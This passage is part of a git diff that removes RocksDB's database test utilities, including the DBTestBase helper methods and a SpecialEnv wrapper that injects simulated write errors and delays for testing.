-    result += NumTableFilesAtLevel(level, cf);
-  }
-  return result;
-}
-
-// Return spread of files per level
-std::string DBTestBase::FilesPerLevel(int cf) {
-  int num_levels =
-      (cf == 0) ? db_->NumberLevels() : db_->NumberLevels(handles_[1]);
-  std::string result;
-  size_t last_non_zero_offset = 0;
-  for (int level = 0; level < num_levels; level++) {
-    int f = NumTableFilesAtLevel(level, cf);
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-    result += buf;
-    if (f > 0) {
-      last_non_zero_offset = result.size();
-    }
-  }
-  result.resize(last_non_zero_offset);
-  return result;
-}
-
-size_t DBTestBase::CountFiles() {
-  std::vector<std::string> files;
-  env_->GetChildren(dbname_, &files);
-
-  std::vector<std::string> logfiles;
-  if (dbname_ != last_options_.wal_dir) {
-    env_->GetChildren(last_options_.wal_dir, &logfiles);
-  }
-
-  return files.size() + logfiles.size();
-}
-
-uint64_t DBTestBase::Size(const Slice& start, const Slice& limit, int cf) {
-  Range r(start, limit);
-  uint64_t size;
-  if (cf == 0) {
-    db_->GetApproximateSizes(&r, 1, &size);
-  } else {
-    db_->GetApproximateSizes(handles_[1], &r, 1, &size);
-  }
-  return size;
-}
-
-void DBTestBase::Compact(int cf, const Slice& start, const Slice& limit,
-                         uint32_t target_path_id) {
-  CompactRangeOptions compact_options;
-  compact_options.target_path_id = target_path_id;
-  ASSERT_OK(db_->CompactRange(compact_options, handles_[cf], &start, &limit));
-}
-
-void DBTestBase::Compact(int cf, const Slice& start, const Slice& limit) {
-  ASSERT_OK(
-      db_->CompactRange(CompactRangeOptions(), handles_[cf], &start, &limit));
-}
-
-void DBTestBase::Compact(const Slice& start, const Slice& limit) {
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &start, &limit));
-}
-
-// Do n memtable compactions, each of which produces an sstable
-// covering the range [small,large].
-void DBTestBase::MakeTables(int n, const std::string& small,
-                            const std::string& large, int cf) {
-  for (int i = 0; i < n; i++) {
-    ASSERT_OK(Put(cf, small, "begin"));
-    ASSERT_OK(Put(cf, large, "end"));
-    ASSERT_OK(Flush(cf));
-    MoveFilesToLevel(n - i - 1, cf);
-  }
-}
-
-// Prevent pushing of new sstables into deeper levels by adding
-// tables that cover a specified range to all levels.
-void DBTestBase::FillLevels(const std::string& smallest,
-                            const std::string& largest, int cf) {
-  MakeTables(db_->NumberLevels(handles_[cf]), smallest, largest, cf);
-}
-
-void DBTestBase::MoveFilesToLevel(int level, int cf) {
-  for (int l = 0; l < level; ++l) {
-    if (cf > 0) {
-      dbfull()->TEST_CompactRange(l, nullptr, nullptr, handles_[cf]);
-    } else {
-      dbfull()->TEST_CompactRange(l, nullptr, nullptr);
-    }
-  }
-}
-
-void DBTestBase::DumpFileCounts(const char* label) {
-  fprintf(stderr, "---\n%s:\n", label);
-  fprintf(stderr, "maxoverlap: %" PRIu64 "\n",
-          dbfull()->TEST_MaxNextLevelOverlappingBytes());
-  for (int level = 0; level < db_->NumberLevels(); level++) {
-    int num = NumTableFilesAtLevel(level);
-    if (num > 0) {
-      fprintf(stderr, "  level %3d : %d files\n", level, num);
-    }
-  }
-}
-
-std::string DBTestBase::DumpSSTableList() {
-  std::string property;
-  db_->GetProperty("rocksdb.sstables", &property);
-  return property;
-}
-
-void DBTestBase::GetSstFiles(std::string path,
-                             std::vector<std::string>* files) {
-  env_->GetChildren(path, files);
-
-  files->erase(
-      std::remove_if(files->begin(), files->end(), [](std::string name) {
-        uint64_t number;
-        FileType type;
-        return !(ParseFileName(name, &number, &type) && type == kTableFile);
-      }), files->end());
-}
-
-int DBTestBase::GetSstFileCount(std::string path) {
-  std::vector<std::string> files;
-  GetSstFiles(path, &files);
-  return static_cast<int>(files.size());
-}
-
-// this will generate non-overlapping files since it keeps increasing key_idx
-void DBTestBase::GenerateNewFile(int cf, Random* rnd, int* key_idx,
-                                 bool nowait) {
-  for (int i = 0; i < KNumKeysByGenerateNewFile; i++) {
-    ASSERT_OK(Put(cf, Key(*key_idx), RandomString(rnd, (i == 99) ? 1 : 990)));
-    (*key_idx)++;
-  }
-  if (!nowait) {
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-}
-
-// this will generate non-overlapping files since it keeps increasing key_idx
-void DBTestBase::GenerateNewFile(Random* rnd, int* key_idx, bool nowait) {
-  for (int i = 0; i < KNumKeysByGenerateNewFile; i++) {
-    ASSERT_OK(Put(Key(*key_idx), RandomString(rnd, (i == 99) ? 1 : 990)));
-    (*key_idx)++;
-  }
-  if (!nowait) {
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-}
-
-const int DBTestBase::kNumKeysByGenerateNewRandomFile = 51;
-
-void DBTestBase::GenerateNewRandomFile(Random* rnd, bool nowait) {
-  for (int i = 0; i < kNumKeysByGenerateNewRandomFile; i++) {
-    ASSERT_OK(Put("key" + RandomString(rnd, 7), RandomString(rnd, 2000)));
-  }
-  ASSERT_OK(Put("key" + RandomString(rnd, 7), RandomString(rnd, 200)));
-  if (!nowait) {
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-}
-
-std::string DBTestBase::IterStatus(Iterator* iter) {
-  std::string result;
-  if (iter->Valid()) {
-    result = iter->key().ToString() + "->" + iter->value().ToString();
-  } else {
-    result = "(invalid)";
-  }
-  return result;
-}
-
-Options DBTestBase::OptionsForLogIterTest() {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.WAL_ttl_seconds = 1000;
-  return options;
-}
-
-std::string DBTestBase::DummyString(size_t len, char c) {
-  return std::string(len, c);
-}
-
-void DBTestBase::VerifyIterLast(std::string expected_key, int cf) {
-  Iterator* iter;
-  ReadOptions ro;
-  if (cf == 0) {
-    iter = db_->NewIterator(ro);
-  } else {
-    iter = db_->NewIterator(ro, handles_[cf]);
-  }
-  iter->SeekToLast();
-  ASSERT_EQ(IterStatus(iter), expected_key);
-  delete iter;
-}
-
-// Used to test InplaceUpdate
-
-// If previous value is nullptr or delta is > than previous value,
-//   sets newValue with delta
-// If previous value is not empty,
-//   updates previous value with 'b' string of previous value size - 1.
-UpdateStatus DBTestBase::updateInPlaceSmallerSize(char* prevValue,
-                                                  uint32_t* prevSize,
-                                                  Slice delta,
-                                                  std::string* newValue) {
-  if (prevValue == nullptr) {
-    *newValue = std::string(delta.size(), 'c');
-    return UpdateStatus::UPDATED;
-  } else {
-    *prevSize = *prevSize - 1;
-    std::string str_b = std::string(*prevSize, 'b');
-    memcpy(prevValue, str_b.c_str(), str_b.size());
-    return UpdateStatus::UPDATED_INPLACE;
-  }
-}
-
-UpdateStatus DBTestBase::updateInPlaceSmallerVarintSize(char* prevValue,
-                                                        uint32_t* prevSize,
-                                                        Slice delta,
-                                                        std::string* newValue) {
-  if (prevValue == nullptr) {
-    *newValue = std::string(delta.size(), 'c');
-    return UpdateStatus::UPDATED;
-  } else {
-    *prevSize = 1;
-    std::string str_b = std::string(*prevSize, 'b');
-    memcpy(prevValue, str_b.c_str(), str_b.size());
-    return UpdateStatus::UPDATED_INPLACE;
-  }
-}
-
-UpdateStatus DBTestBase::updateInPlaceLargerSize(char* prevValue,
-                                                 uint32_t* prevSize,
-                                                 Slice delta,
-                                                 std::string* newValue) {
-  *newValue = std::string(delta.size(), 'c');
-  return UpdateStatus::UPDATED;
-}
-
-UpdateStatus DBTestBase::updateInPlaceNoAction(char* prevValue,
-                                               uint32_t* prevSize, Slice delta,
-                                               std::string* newValue) {
-  return UpdateStatus::UPDATE_FAILED;
-}
-
-// Utility method to test InplaceUpdate
-void DBTestBase::validateNumberOfEntries(int numValues, int cf) {
-  ScopedArenaIterator iter;
-  Arena arena;
-  auto options = CurrentOptions();
-  InternalKeyComparator icmp(options.comparator);
-  RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-  if (cf != 0) {
-    iter.set(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[cf]));
-  } else {
-    iter.set(dbfull()->NewInternalIterator(&arena, &range_del_agg));
-  }
-  iter->SeekToFirst();
-  ASSERT_EQ(iter->status().ok(), true);
-  int seq = numValues;
-  while (iter->Valid()) {
-    ParsedInternalKey ikey;
-    ikey.sequence = -1;
-    ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-
-    // checks sequence number for updates
-    ASSERT_EQ(ikey.sequence, (unsigned)seq--);
-    iter->Next();
-  }
-  ASSERT_EQ(0, seq);
-}
-
-void DBTestBase::CopyFile(const std::string& source,
-                          const std::string& destination, uint64_t size) {
-  const EnvOptions soptions;
-  unique_ptr<SequentialFile> srcfile;
-  ASSERT_OK(env_->NewSequentialFile(source, &srcfile, soptions));
-  unique_ptr<WritableFile> destfile;
-  ASSERT_OK(env_->NewWritableFile(destination, &destfile, soptions));
-
-  if (size == 0) {
-    // default argument means copy everything
-    ASSERT_OK(env_->GetFileSize(source, &size));
-  }
-
-  char buffer[4096];
-  Slice slice;
-  while (size > 0) {
-    uint64_t one = std::min(uint64_t(sizeof(buffer)), size);
-    ASSERT_OK(srcfile->Read(one, &slice, buffer));
-    ASSERT_OK(destfile->Append(slice));
-    size -= slice.size();
-  }
-  ASSERT_OK(destfile->Close());
-}
-
-std::unordered_map<std::string, uint64_t> DBTestBase::GetAllSSTFiles(
-    uint64_t* total_size) {
-  std::unordered_map<std::string, uint64_t> res;
-
-  if (total_size) {
-    *total_size = 0;
-  }
-  std::vector<std::string> files;
-  env_->GetChildren(dbname_, &files);
-  for (auto& file_name : files) {
-    uint64_t number;
-    FileType type;
-    std::string file_path = dbname_ + "/" + file_name;
-    if (ParseFileName(file_name, &number, &type) && type == kTableFile) {
-      uint64_t file_size = 0;
-      env_->GetFileSize(file_path, &file_size);
-      res[file_path] = file_size;
-      if (total_size) {
-        *total_size += file_size;
-      }
-    }
-  }
-  return res;
-}
-
-std::vector<std::uint64_t> DBTestBase::ListTableFiles(Env* env,
-                                                      const std::string& path) {
-  std::vector<std::string> files;
-  std::vector<uint64_t> file_numbers;
-  env->GetChildren(path, &files);
-  uint64_t number;
-  FileType type;
-  for (size_t i = 0; i < files.size(); ++i) {
-    if (ParseFileName(files[i], &number, &type)) {
-      if (type == kTableFile) {
-        file_numbers.push_back(number);
-      }
-    }
-  }
-  return file_numbers;
-}
-
-void DBTestBase::VerifyDBFromMap(std::map<std::string, std::string> true_data,
-                                 size_t* total_reads_res, bool tailing_iter,
-                                 std::map<std::string, Status> status) {
-  size_t total_reads = 0;
-
-  for (auto& kv : true_data) {
-    Status s = status[kv.first];
-    if (s.ok()) {
-      ASSERT_EQ(Get(kv.first), kv.second);
-    } else {
-      std::string value;
-      ASSERT_EQ(s, db_->Get(ReadOptions(), kv.first, &value));
-    }
-    total_reads++;
-  }
-
-  // Normal Iterator
-  {
-    int iter_cnt = 0;
-    ReadOptions ro;
-    ro.total_order_seek = true;
-    Iterator* iter = db_->NewIterator(ro);
-    // Verify Iterator::Next()
-    iter_cnt = 0;
-    auto data_iter = true_data.begin();
-    Status s;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next(), data_iter++) {
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      Status current_status = status[data_iter->first];
-      if (!current_status.ok()) {
-        s = current_status;
-      }
-      ASSERT_EQ(iter->status(), s);
-      if (current_status.ok()) {
-        ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      }
-      iter_cnt++;
-      total_reads++;
-    }
-    ASSERT_EQ(data_iter, true_data.end()) << iter_cnt << " / "
-                                          << true_data.size();
-    delete iter;
-
-    // Verify Iterator::Prev()
-    // Use a new iterator to make sure its status is clean.
-    iter = db_->NewIterator(ro);
-    iter_cnt = 0;
-    s = Status::OK();
-    auto data_rev = true_data.rbegin();
-    for (iter->SeekToLast(); iter->Valid(); iter->Prev(), data_rev++) {
-      ASSERT_EQ(iter->key().ToString(), data_rev->first);
-      Status current_status = status[data_rev->first];
-      if (!current_status.ok()) {
-        s = current_status;
-      }
-      ASSERT_EQ(iter->status(), s);
-      if (current_status.ok()) {
-        ASSERT_EQ(iter->value().ToString(), data_rev->second);
-      }
-      iter_cnt++;
-      total_reads++;
-    }
-    ASSERT_EQ(data_rev, true_data.rend()) << iter_cnt << " / "
-                                          << true_data.size();
-
-    // Verify Iterator::Seek()
-    for (auto kv : true_data) {
-      iter->Seek(kv.first);
-      ASSERT_EQ(kv.first, iter->key().ToString());
-      ASSERT_EQ(kv.second, iter->value().ToString());
-      total_reads++;
-    }
-    delete iter;
-  }
-
-  if (tailing_iter) {
-#ifndef ROCKSDB_LITE
-    // Tailing iterator
-    int iter_cnt = 0;
-    ReadOptions ro;
-    ro.tailing = true;
-    ro.total_order_seek = true;
-    Iterator* iter = db_->NewIterator(ro);
-
-    // Verify ForwardIterator::Next()
-    iter_cnt = 0;
-    auto data_iter = true_data.begin();
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next(), data_iter++) {
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      iter_cnt++;
-      total_reads++;
-    }
-    ASSERT_EQ(data_iter, true_data.end()) << iter_cnt << " / "
-                                          << true_data.size();
-
-    // Verify ForwardIterator::Seek()
-    for (auto kv : true_data) {
-      iter->Seek(kv.first);
-      ASSERT_EQ(kv.first, iter->key().ToString());
-      ASSERT_EQ(kv.second, iter->value().ToString());
-      total_reads++;
-    }
-
-    delete iter;
-#endif  // ROCKSDB_LITE
-  }
-
-  if (total_reads_res) {
-    *total_reads_res = total_reads;
-  }
-}
-
-void DBTestBase::VerifyDBInternal(
-    std::vector<std::pair<std::string, std::string>> true_data) {
-  Arena arena;
-  InternalKeyComparator icmp(last_options_.comparator);
-  RangeDelAggregator range_del_agg(icmp, {});
-  auto iter = dbfull()->NewInternalIterator(&arena, &range_del_agg);
-  iter->SeekToFirst();
-  for (auto p : true_data) {
-    ASSERT_TRUE(iter->Valid());
-    ParsedInternalKey ikey;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &ikey));
-    ASSERT_EQ(p.first, ikey.user_key);
-    ASSERT_EQ(p.second, iter->value());
-    iter->Next();
-  };
-  ASSERT_FALSE(iter->Valid());
-  iter->~InternalIterator();
-}
-
-#ifndef ROCKSDB_LITE
-
-uint64_t DBTestBase::GetNumberOfSstFilesForColumnFamily(
-    DB* db, std::string column_family_name) {
-  std::vector<LiveFileMetaData> metadata;
-  db->GetLiveFilesMetaData(&metadata);
-  uint64_t result = 0;
-  for (auto& fileMetadata : metadata) {
-    result += (fileMetadata.column_family_name == column_family_name);
-  }
-  return result;
-}
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_test_util.h b/thirdparty/rocksdb/db/db_test_util.h
deleted file mode 100644
index f2caa46..0000000
--- a/thirdparty/rocksdb/db/db_test_util.h
+++ /dev/null
@@ -1,970 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <fcntl.h>
-#include <inttypes.h>
-
-#include <algorithm>
-#include <map>
-#include <set>
-#include <string>
-#include <thread>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "env/mock_env.h"
-#include "memtable/hash_linklist_rep.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/sst_file_writer.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "table/block_based_table_factory.h"
-#include "table/mock_table.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/compression.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-namespace anon {
-class AtomicCounter {
- public:
-  explicit AtomicCounter(Env* env = NULL)
-      : env_(env), cond_count_(&mu_), count_(0) {}
-
-  void Increment() {
-    MutexLock l(&mu_);
-    count_++;
-    cond_count_.SignalAll();
-  }
-
-  int Read() {
-    MutexLock l(&mu_);
-    return count_;
-  }
-
-  bool WaitFor(int count) {
-    MutexLock l(&mu_);
-
-    uint64_t start = env_->NowMicros();
-    while (count_ < count) {
-      uint64_t now = env_->NowMicros();
-      cond_count_.TimedWait(now + /*1s*/ 1 * 1000 * 1000);
-      if (env_->NowMicros() - start > /*10s*/ 10 * 1000 * 1000) {
-        return false;
-      }
-      if (count_ < count) {
-        GTEST_LOG_(WARNING) << "WaitFor is taking more time than usual";
-      }
-    }
-
-    return true;
-  }
-
-  void Reset() {
-    MutexLock l(&mu_);
-    count_ = 0;
-    cond_count_.SignalAll();
-  }
-
- private:
-  Env* env_;
-  port::Mutex mu_;
-  port::CondVar cond_count_;
-  int count_;
-};
-
-struct OptionsOverride {
-  std::shared_ptr<const FilterPolicy> filter_policy = nullptr;
-  // These will be used only if filter_policy is set
-  bool partition_filters = false;
-  uint64_t metadata_block_size = 1024;
-  BlockBasedTableOptions::IndexType index_type =
-      BlockBasedTableOptions::IndexType::kBinarySearch;
-
-  // Used as a bit mask of individual enums in which to skip an XF test point
-  int skip_policy = 0;
-};
-
-}  // namespace anon
-
-enum SkipPolicy { kSkipNone = 0, kSkipNoSnapshot = 1, kSkipNoPrefix = 2 };
-
-// A hacky skip list mem table that triggers flush after number of entries.
-class SpecialMemTableRep : public MemTableRep {
- public:
-  explicit SpecialMemTableRep(Allocator* allocator, MemTableRep* memtable,
-                              int num_entries_flush)
-      : MemTableRep(allocator),
-        memtable_(memtable),
-        num_entries_flush_(num_entries_flush),
-        num_entries_(0) {}
-
-  virtual KeyHandle Allocate(const size_t len, char** buf) override {
-    return memtable_->Allocate(len, buf);
-  }
-
-  // Insert key into the list.
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  virtual void Insert(KeyHandle handle) override {
-    memtable_->Insert(handle);
-    num_entries_++;
-  }
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  virtual bool Contains(const char* key) const override {
-    return memtable_->Contains(key);
-  }
-
-  virtual size_t ApproximateMemoryUsage() override {
-    // Return a high memory usage when number of entries exceeds the threshold
-    // to trigger a flush.
-    return (num_entries_ < num_entries_flush_) ? 0 : 1024 * 1024 * 1024;
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override {
-    memtable_->Get(k, callback_args, callback_func);
-  }
-
-  uint64_t ApproximateNumEntries(const Slice& start_ikey,
-                                 const Slice& end_ikey) override {
-    return memtable_->ApproximateNumEntries(start_ikey, end_ikey);
-  }
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override {
-    return memtable_->GetIterator(arena);
-  }
-
-  virtual ~SpecialMemTableRep() override {}
-
- private:
-  unique_ptr<MemTableRep> memtable_;
-  int num_entries_flush_;
-  int num_entries_;
-};
-
-// The factory for the hacky skip list mem table that triggers flush after
-// number of entries exceeds a threshold.
-class SpecialSkipListFactory : public MemTableRepFactory {
- public:
-  // After number of inserts exceeds `num_entries_flush` in a mem table, trigger
-  // flush.
-  explicit SpecialSkipListFactory(int num_entries_flush)
-      : num_entries_flush_(num_entries_flush) {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override {
-    return new SpecialMemTableRep(
-        allocator, factory_.CreateMemTableRep(compare, allocator, transform, 0),
-        num_entries_flush_);
-  }
-  virtual const char* Name() const override { return "SkipListFactory"; }
-
-  bool IsInsertConcurrentlySupported() const override {
-    return factory_.IsInsertConcurrentlySupported();
-  }
-
- private:
-  SkipListFactory factory_;
-  int num_entries_flush_;
-};
-
-// Special Env used to delay background operations
-class SpecialEnv : public EnvWrapper {
- public:
-  explicit SpecialEnv(Env* base);
-
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& soptions) override {
-    class SSTableFile : public WritableFile {
-     private:
-      SpecialEnv* env_;
-      unique_ptr<WritableFile> base_;
-
-     public:
-      SSTableFile(SpecialEnv* env, unique_ptr<WritableFile>&& base)
-          : env_(env), base_(std::move(base)) {}
-      Status Append(const Slice& data) override {
-        if (env_->table_write_callback_) {
-          (*env_->table_write_callback_)();
-        }
-        if (env_->drop_writes_.load(std::memory_order_acquire)) {
-          // Drop writes on the floor
-          return Status::OK();
-        } else if (env_->no_space_.load(std::memory_order_acquire)) {
-          return Status::NoSpace("No space left on device");
-        } else {
-          env_->bytes_written_ += data.size();
-          return base_->Append(data);
-        }
-      }
-      Status PositionedAppend(const Slice& data, uint64_t offset) override {
-        if (env_->table_write_callback_) {
-          (*env_->table_write_callback_)();
-        }
-        if (env_->drop_writes_.load(std::memory_order_acquire)) {
-          // Drop writes on the floor
-          return Status::OK();
-        } else if (env_->no_space_.load(std::memory_order_acquire)) {
-          return Status::NoSpace("No space left on device");
-        } else {
-          env_->bytes_written_ += data.size();
-          return base_->PositionedAppend(data, offset);
-        }
-      }
-      Status Truncate(uint64_t size) override { return base_->Truncate(size); }
-      Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-        Status s = base_->RangeSync(offset, nbytes);
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT_CALLBACK("SpecialEnv::SStableFile::RangeSync", &s);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        return s;
-      }
-      Status Close() override {
-// SyncPoint is not supported in Released Windows Mode.
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        // Check preallocation size
-        // preallocation size is never passed to base file.
-        size_t preallocation_size = preallocation_block_size();
-        TEST_SYNC_POINT_CALLBACK("DBTestWritableFile.GetPreallocationStatus",
-                                 &preallocation_size);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        Status s = base_->Close();
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT_CALLBACK("SpecialEnv::SStableFile::Close", &s);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        return s;
-      }
-      Status Flush() override { return base_->Flush(); }
-      Status Sync() override {
-        ++env_->sync_counter_;
-        while (env_->delay_sstable_sync_.load(std::memory_order_acquire)) {
-          env_->SleepForMicroseconds(100000);
-        }
-        Status s = base_->Sync();
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT_CALLBACK("SpecialEnv::SStableFile::Sync", &s);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-        return s;
-      }
-      void SetIOPriority(Env::IOPriority pri) override {
-        base_->SetIOPriority(pri);
-      }
-      Env::IOPriority GetIOPriority() override {
-        return base_->GetIOPriority();
-      }
-      bool use_direct_io() const override {
-        return base_->use_direct_io();
-      }
-      Status Allocate(uint64_t offset, uint64_t len) override {
-        return base_->Allocate(offset, len);
-      }
-    };
-    class ManifestFile : public WritableFile {
-     public:
-      ManifestFile(SpecialEnv* env, unique_ptr<WritableFile>&& b)
-          : env_(env), base_(std::move(b)) {}
-      Status Append(const Slice& data) override {
-        if (env_->manifest_write_error_.load(std::memory_order_acquire)) {
-          return Status::IOError("simulated writer error");
-        } else {
-          return base_->Append(data);
-        }
-      }
-      Status Truncate(uint64_t size) override { return base_->Truncate(size); }
-      Status Close() override { return base_->Close(); }
-      Status Flush() override { return base_->Flush(); }
-      Status Sync() override {
-        ++env_->sync_counter_;
-        if (env_->manifest_sync_error_.load(std::memory_order_acquire)) {
-          return Status::IOError("simulated sync error");
-        } else {
-          return base_->Sync();
-        }
-      }
-      uint64_t GetFileSize() override { return base_->GetFileSize(); }
-
-     private:
-      SpecialEnv* env_;
-      unique_ptr<WritableFile> base_;
-    };
-    class WalFile : public WritableFile {
-     public:
-      WalFile(SpecialEnv* env, unique_ptr<WritableFile>&& b)
-          : env_(env), base_(std::move(b)) {
-        env_->num_open_wal_file_.fetch_add(1);
-      }
-      virtual ~WalFile() { env_->num_open_wal_file_.fetch_add(-1); }
-      Status Append(const Slice& data) override {
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT("SpecialEnv::WalFile::Append:1");
-#endif
-        Status s;
-        if (env_->log_write_error_.load(std::memory_order_acquire)) {
-          s = Status::IOError("simulated writer error");
-        } else {
-          int slowdown =
-              env_->log_write_slowdown_.load(std::memory_order_acquire);
-          if (slowdown > 0) {
-            env_->SleepForMicroseconds(slowdown);
-          }
-          s = base_->Append(data);
-        }
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        TEST_SYNC_POINT("SpecialEnv::WalFile::Append:2");
-#endif
-        return s;
-      }
-      Status Truncate(uint64_t size) override { return base_->Truncate(size); }
-      Status Close() override {
-// SyncPoint is not supported in Released Windows Mode.
-#if !(defined NDEBUG) || !defined(OS_WIN)
-        // Check preallocation size
-        // preallocation size is never passed to base file.
-        size_t preallocation_size = preallocation_block_size();
-        TEST_SYNC_POINT_CALLBACK("DBTestWalFile.GetPreallocationStatus",
-                                 &preallocation_size);
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-
-        return base_->Close();
-      }
-      Status Flush() override { return base_->Flush(); }
-      Status Sync() override {
-        ++env_->sync_counter_;
-        return base_->Sync();
-      }
-      bool IsSyncThreadSafe() const override {
-        return env_->is_wal_sync_thread_safe_.load();
-      }
-
-     private:
-      SpecialEnv* env_;
-      unique_ptr<WritableFile> base_;
-    };
-
-    if (non_writeable_rate_.load(std::memory_order_acquire) > 0) {
-      uint32_t random_number;
-      {
-        MutexLock l(&rnd_mutex_);
-        random_number = rnd_.Uniform(100);
-      }
-      if (random_number < non_writeable_rate_.load()) {
-        return Status::IOError("simulated random write error");
-      }
-    }
-
-    new_writable_count_++;
-
-    if (non_writable_count_.load() > 0) {
-      non_writable_count_--;
-      return Status::IOError("simulated write error");
-    }
-
-    EnvOptions optimized = soptions;
-    if (strstr(f.c_str(), "MANIFEST") != nullptr ||
-        strstr(f.c_str(), "log") != nullptr) {
-      optimized.use_mmap_writes = false;
-      optimized.use_direct_writes = false;
-    }
-
-    Status s = target()->NewWritableFile(f, r, optimized);
-    if (s.ok()) {
-      if (strstr(f.c_str(), ".sst") != nullptr) {
-        r->reset(new SSTableFile(this, std::move(*r)));
-      } else if (strstr(f.c_str(), "MANIFEST") != nullptr) {
-        r->reset(new ManifestFile(this, std::move(*r)));
-      } else if (strstr(f.c_str(), "log") != nullptr) {
-        r->reset(new WalFile(this, std::move(*r)));
-      }
-    }
-    return s;
-  }
-
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& soptions) override {
-    class CountingFile : public RandomAccessFile {
-     public:
-      CountingFile(unique_ptr<RandomAccessFile>&& target,
-                   anon::AtomicCounter* counter,
-                   std::atomic<size_t>* bytes_read)
-          : target_(std::move(target)),
-            counter_(counter),
-            bytes_read_(bytes_read) {}
-      virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                          char* scratch) const override {
-        counter_->Increment();
-        Status s = target_->Read(offset, n, result, scratch);
-        *bytes_read_ += result->size();
-        return s;
-      }
-
-     private:
-      unique_ptr<RandomAccessFile> target_;
-      anon::AtomicCounter* counter_;
-      std::atomic<size_t>* bytes_read_;
-    };
-
-    Status s = target()->NewRandomAccessFile(f, r, soptions);
-    random_file_open_counter_++;
-    if (s.ok() && count_random_reads_) {
-      r->reset(new CountingFile(std::move(*r), &random_read_counter_,
-                                &random_read_bytes_counter_));
-    }
-    return s;
-  }
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& soptions) override {
-    class CountingFile : public SequentialFile {
-     public:
-      CountingFile(unique_ptr<SequentialFile>&& target,
-                   anon::AtomicCounter* counter)
-          : target_(std::move(target)), counter_(counter) {}
-      virtual Status Read(size_t n, Slice* result, char* scratch) override {
-        counter_->Increment();
-        return target_->Read(n, result, scratch);
-      }
-      virtual Status Skip(uint64_t n) override { return target_->Skip(n); }
-
-     private:
-      unique_ptr<SequentialFile> target_;
-      anon::AtomicCounter* counter_;
-    };
-
-    Status s = target()->NewSequentialFile(f, r, soptions);
-    if (s.ok() && count_sequential_reads_) {
-      r->reset(new CountingFile(std::move(*r), &sequential_read_counter_));
-    }
-    return s;
-  }
-
-  virtual void SleepForMicroseconds(int micros) override {
-    sleep_counter_.Increment();
-    if (no_slowdown_ || time_elapse_only_sleep_) {
-      addon_time_.fetch_add(micros);
-    }
-    if (!no_slowdown_) {
-      target()->SleepForMicroseconds(micros);
-    }
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) override {
-    Status s;
-    if (!time_elapse_only_sleep_) {
-      s = target()->GetCurrentTime(unix_time);
-    }
-    if (s.ok()) {
-      *unix_time += addon_time_.load();
-    }
-    return s;
-  }
-
-  virtual uint64_t NowNanos() override {
-    return (time_elapse_only_sleep_ ? 0 : target()->NowNanos()) +
-           addon_time_.load() * 1000;
-  }
-
